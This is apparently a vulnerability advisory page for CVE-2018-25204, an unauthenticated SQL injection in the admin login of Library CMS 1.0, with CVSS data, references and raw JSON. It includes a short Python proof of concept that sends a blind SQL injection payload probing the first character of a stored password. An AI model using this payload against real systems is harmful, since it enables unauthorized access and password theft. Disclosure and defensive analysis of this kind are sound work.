Security Vulnerability Report
CVE-2018-25204 CVSS 8.2 HIGH

Published: 2026-03-26 12:16:05
Last Modified: 2026-03-31 01:15:27

Description

Library CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to bypass authentication by injecting SQL code through the username parameter. Attackers can send POST requests to the admin login endpoint with boolean-based blind SQL injection payloads in the username field to manipulate database queries and gain unauthorized access.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wecodex:library_cms:1.0:*:*:*:*:*:*:* - VULNERABLE
Library CMS 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def check_sqli(url):
    # Target login endpoint
    login_url = f"{url}/admin/login.php"  # Assuming path based on common CMS structures

    # Payload for boolean-based blind SQL injection
    # The response differs depending on whether the injected condition is true or false
    payload = "admin' AND (SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a'#"

    data = {
        "username": payload,
        "password": "random",
    }

    try:
        response = requests.post(login_url, data=data, timeout=5)
        # Analysis logic depends on application behavior (e.g., response time or content)
        print(f"Status Code: {response.status_code}")
        print(f"Response Length: {len(response.text)}")
        # In a real exploit, logic would compare this to a baseline request
    except requests.RequestException as e:
        print(f"Error connecting to target: {e}")


# Example usage
# check_sqli("http://127.0.0.1")
```

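References

https://www.exploit-db.com/exploits/44728 (Exploit, VDB Entry, Third Party Advisory)
https://www.vulncheck.com/advisories/library-cms-sql-injection-via-admin-login (Third Party Advisory)
https://www.wecodex.com/item/view/library-management-system-in-php-and-mysql/1 (Broken Link)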

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25204", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:05.247", "lastModified": "2026-03-31T01:15:27.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Library CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to bypass authentication by injecting SQL code through the username parameter. Attackers can send POST requests to the admin login endpoint with boolean-based blind SQL injection payloads in the username field to manipulate database queries and gain unauthorized access."}, {"lang": "es", "value": "Biblioteca CMS 1.0 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados eludir la autenticación inyectando código SQL a través del parámetro de nombre de usuario. Los atacantes pueden enviar solicitudes POST al endpoint de inicio de sesión de administrador con cargas útiles de inyección SQL ciega basada en booleanos en el campo de nombre de usuario para manipular consultas de base de datos y obtener acceso no autorizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wecodex:library_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E449D841-3BB9-4F7B-A2AB-5A65A1CE002E"}]}]}], "references": [{"url": 
"https://www.exploit-db.com/exploits/44728", "source": "[email protected]", "tags": ["Exploit", "VDB Entry", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/library-cms-sql-injection-via-admin-login", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wecodex.com/item/view/library-management-system-in-php-and-mysql/1", "source": "[email protected]", "tags": ["Broken Link"]}]}}